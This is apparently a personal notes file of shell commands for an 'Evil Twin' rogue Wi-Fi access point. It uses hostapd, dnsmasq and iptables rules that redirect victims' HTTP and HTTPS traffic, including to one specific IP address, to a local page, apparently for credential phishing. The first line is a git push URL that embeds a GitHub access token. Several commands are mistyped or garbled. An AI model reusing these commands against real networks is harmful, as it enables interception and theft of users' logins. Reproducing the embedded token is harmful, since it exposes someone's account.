git push https://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@github.com/Wireless-Network-Security/Evil-Twin.git

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT

########################################################################
iptables -t nat -A PREROUTING -p tcp --destination --dport 80 -j DNAT --to-destination 192.168.1.1:80
iptables -t nat -A POSTROUTING -p tcp --dport 443  -d 31.13.79.65 -j DNAT --to-destination 192.168.1.1:80

iptables -t nat -A PREROUTING -i wlx6c5ab03ab2f5 -p tcp --dport 80 -j DNAT  --to-destination  192.168.1.1:80
iptables -t nat -A PREROUTING -i wlx6c5ab03ab2f5 -p tcp --dport 443 -j DNAT --to-destination  192.168.1.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE
########################################################################

iptables --table nat --append POSTROUTING --out-interface wlx6c5ab03ab2f5 -j MASQUE
iptables --append FORWARD --in-interface wlx6c5ab03ab2f5 -j ACCEPT







###########################################################################3
systemctl restart NetworkManager.service
systemctl stop NetworkManager.service 

ifconfig wlx6c5ab03ab2f5 down
iwconfig wlx6c5ab03ab2f5 mode monitor
ifconfig wlx6c5ab03ab2f5 up

hostapd hostapd.conf 


ifconfig wlx6c5ab03ab2f5 192.168.1.1 netmask 255.255.255.0

ifconfig wlx6c5ab03ab2f5 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf 


#######################33
iptables --table nat --flush

############################

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -i wlx6c5ab03ab2f5 -p tcp --dport 80 -j DNAT  --to-destination  192.168.1.1:80
iptables -t nat -A PREROUTING -i wlx6c5ab03ab2f5 -p tcp --dport 443 -j DNAT --to-destination  192.168.1.1:80
iptables --table nat --append POSTROUTING -out-interface wlx6c5ab03ab2f5 -j MASQUERADE   
iptables --append FORWARD --in-interface wlx6c5ab03ab2f5 -j ACCEPT

iptables -t nat -A POSTROUTING -j MASQUERADE

echo 1 > /proc/sys/net/ipv4/ip_forward




ifconfig wlx6c5ab03ab2f5 down
iwconfig wlx6c5ab03ab2f5 mode monitor
ifconfig wlx6c5ab03ab2f5 up








###################################################################################
Create AP:


sudo alllllll

systemctl restart NetworkManager.service
systemctl stop NetworkManager.service 

ifconfig wlx6c5ab03ab2f5 down
iwconfig wlx6c5ab03ab2f5 mode monitor
ifconfig wlx6c5ab03ab2f5

hostapd pap/hostapd.conf 

dnsmasq -C pap/dnsmasq.conf -d